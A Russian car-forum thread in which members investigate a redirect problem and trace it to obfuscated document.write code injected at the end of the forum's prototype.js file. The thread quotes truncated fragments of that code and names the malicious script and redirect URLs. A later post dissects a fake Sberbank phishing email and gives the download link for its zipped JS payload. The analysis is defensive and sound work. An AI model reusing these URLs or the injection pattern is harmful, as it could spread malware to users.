Перейти к содержанию
Форум Челябинских Автомобилистов

Глюк или вирус?

dok

Автор dok
в Интернет, Компьютеры и ПО

 Поделиться

Рекомендуемые сообщения

Закрепленные сообщения
dok Водитель-профессионал

dok

Опубликовано
Опубликовано

Когда я в командировках захожу на сайт с тел время от времени при первом входе перенаправляет на какойто сайт. Антивирус его блокирует. Сбрасываю захожу снова нормально. Полная проверка антивирусом результатов не дает.

Тел. Андроид. Антивирус ДрВеб

Так происходит только на карсе

Ссылка на комментарий
Поделиться на другие сайты
  • 2 недели спустя...
  • Ответов 155
  • Создана
  • Последний ответ

Топ авторов темы

Популярные дни

Топ авторов темы

Популярные дни

Популярные посты

yellow_rabbit
yellow_rabbit

исследуем дальше. уже выяснили кто и откуда вызывает это.   смотрим скрипт от тапатолка   его вызывает строка document["\x77\x72\x69\x74\x65"]("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x6

Aland
Aland

Господа. Будьте проще) не уподобляйтесь.

yellow_rabbit
yellow_rabbit

зачем то потратил время. чего нашел какой то раздел вызывает скрипт по адресу http://psnmail.me/jquery8.js причем вызывается на напрямую, а через редирект (от сайта https://goo.gl/44qqIe) который, в с

Изображения в теме

Незакрепленные сообщения
striker Водитель-профессионал

striker

Опубликовано
Опубликовано

это всё wap-ресурсы билайна, а не форум. Осталось узнать, откуда это лезет, где или чем подмена делается? 

Ссылка на комментарий
Поделиться на другие сайты
Стасян Водитель-профессионал

Стасян

Опубликовано
Опубликовано

это всё wap-ресурсы билайна, а не форум. Осталось узнать, откуда это лезет, где или чем подмена делается?

Всё может быть.

Вопрос только один, почему эта хрень вылазит только на КК? На других сайтах её нет.

Ссылка на комментарий
Поделиться на другие сайты
yellow_rabbit Водитель-профессионал

yellow_rabbit

Опубликовано
Опубликовано

 

 


все хорошо

случайность.

 

краткий анализ показал следующее.

 

1. запрос на загрузку данных присутствует в коде (чего и как вызывается описывал ранее, сейчас оно же).

2. вызывается в общем коде форума, т.е. не на какой то теме, а всегда

3. запрос идет с файла

http://www.carsclub.ru/forum/public/js/3rd_party/prototype.js

4. описание этого файла

/*  Prototype JavaScript framework, version 1.7.1
 *  (c) 2005-2010 Sam Stephenson

ну типа валидная js либа.

загуглил, да, типа валидная

5. код вызова левых данных в конце этого скрипта

6. можно убрать руками, найдя (и предварительно забекапясь) данные 

document["\x77\x72\x69\x74\x65"]("\x3C\x7

и до конца файла.

7. и самое главное.

судя по одинаковости кода, командор, а случаем никто форм не ломает?

либо со стороны дыр форума, либо через другой акк от хостера (ну или диверсант от госдепа)

  • Плюс 2
Ссылка на комментарий
Поделиться на другие сайты
Raider Водитель-профессионал

Raider

Опубликовано
Опубликовано

судя по одинаковости кода, командор, а случаем никто форум не ломает?

либо со стороны дыр форума, либо через другой акк от хостера (ну или диверсант от госдепа)

на всякий случай потру личку...

Ссылка на комментарий
Поделиться на другие сайты
  • 1 месяц спустя...
Design_Nick Водитель-профессионал

Design_Nick

Опубликовано
Опубликовано

Код почистили сегодня. Просьба посмотреть и отписаться о наличии / отсутствии проблем.

Ссылка на комментарий
Поделиться на другие сайты
Design_Nick Водитель-профессионал

Design_Nick

Опубликовано
Опубликовано
Не поверишь, у меня тоже 1 раз было предложение подписаться. На андроид и мегафон.
  • Плюс 1
Ссылка на комментарий
Поделиться на другие сайты
Aland Водитель-профессионал

Aland

Опубликовано
Опубликовано

post-7645-0-54227700-1471552485_thumb.png

Дело давнее, но было. При загрузке сафари на открытой вкладке Карсклуба вылезла эта картинка.

Ссылка на комментарий
Поделиться на другие сайты
Design_Nick Водитель-профессионал

Design_Nick

Опубликовано
Опубликовано

@Aland, вот ты специально меня пугаешь? :((((((((((((

 

Я когда написал что код вычистили? :) Вчера а не 28/07

 

 


Код почистили сегодня. Просьба посмотреть и отписаться о наличии / отсутствии проблем.
Ссылка на комментарий
Поделиться на другие сайты
  • 2 месяца спустя...
yellow_rabbit Водитель-профессионал

yellow_rabbit

Опубликовано
Опубликовано

пришло письмо.

отправитель сбербанковский пользователь, теле письма даже какие то фио без телефона указаны.

но в хидерах указан ИП итальянского хоста.

мой сервер (пришло на корпоративный адрес, который точно в сбере не засвечен) пометил письмо как спам.

 

суть письма, что я денег должен и ссылочка.

по ссылке архив с файлом js

 

а вот теперь странности.

не очень надеясь на зрение, тем более читаю по хешам, думал обычный фишинг, когда часть адреса подменяется и в целом адрес похож, но по факту другой.

дык вот.

беру первую половину адреса, копирую в браузер

и (тадам!)

открывается сбер!!! ну понятно, что какая то левая страница, но это сбер!

переписываем протокол на https и получаем подтверждение сертификата.

 

ладно.

идем дальше.

кратко анализируем файл, на сколько позволяют знания, там обычная фигня с попытками зашифрования.

делается activeX объект и чего то там формируется (тут знания кончились).

 

идем на вирус тотал.

грузим.

- первая проверка была всего 4 часа назад

- только какой то левый антивирус узрел в этом угрозу.

 

гуглим по запросу присланной ссылочки.

гугл, в подсказках выдает похожие запросы, ну т.е. уже поиск по этой фигне идет, но в самих результатах поиска нифига, кроме самого сбера нет.

 

взломали сбер?

 

PS: как обычно, будьте бдительны, ББ все видит.

Ссылка на комментарий
Поделиться на другие сайты
yellow_rabbit Водитель-профессионал

yellow_rabbit

Опубликовано
Опубликовано

дальнейшие исследования.

где то я чего то пропускаю.

т.к. конечная ссылка идет с другого адреса

 

вот ссылка в письме

 

http://sberbank.ru/load/2016-11-01/196

 

 

а качается от сюда

 

http://konkurs.dobrovoblago.ru/wp-content/themes/Basic303/images/2016/01.11_raschet.zip

 

Ссылка на комментарий
Поделиться на другие сайты
yellow_rabbit Водитель-профессионал

yellow_rabbit

Опубликовано
Опубликовано

еще дополнение.

нашел где пропускаю.

 

письмо не plain text

а обычный html

 

ну там разные отмазки про усталость и короткую неделю и т.д.

в общем, лоханулся.

 

ссылка сразу идет на левый адрес.

т.е. надо конечникам написать, что их ломанули.

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Сейчас на странице   0 пользователей онлайн

    • Ни одного зарегистрированного пользователя не просматривает данную страницу

×
×
  • Создать...